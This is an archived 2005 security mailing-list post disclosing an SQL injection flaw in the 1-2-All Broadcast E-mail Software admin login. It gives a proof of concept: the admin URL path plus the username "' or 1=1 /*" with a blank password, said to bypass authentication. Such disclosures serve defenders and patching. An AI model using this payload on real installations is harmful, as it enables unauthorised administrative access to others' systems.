OSEC

Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email hr@neohapsis.com
 
1-2-All Broadcast E-mail Software vulnerable to a classic SQL admin

bhs_teamyahoo.com
Date: Fri Nov 11 2005 - 13:52:41 CST


1-2-All Broadcast E-mail Software ( POC )
Supplying the following is sufficient to gain access to the admin control panel:

Target :

http://www.example.com/[12allTarget]/admin/index.php

Username: ' or 1=1 /*
Password: (Nothing)(Blank)

Report By : POPO
>From>IRAN> www.Babol-Hackers.com
bhs_teamyahoo.com
Y! ID : bhs_team , pooya_0nline
-----------------------------------
BHS-Team

We Are : POPO + Padeshah + Black ICE + Ezraeil + UNDERTAKER + Fa0p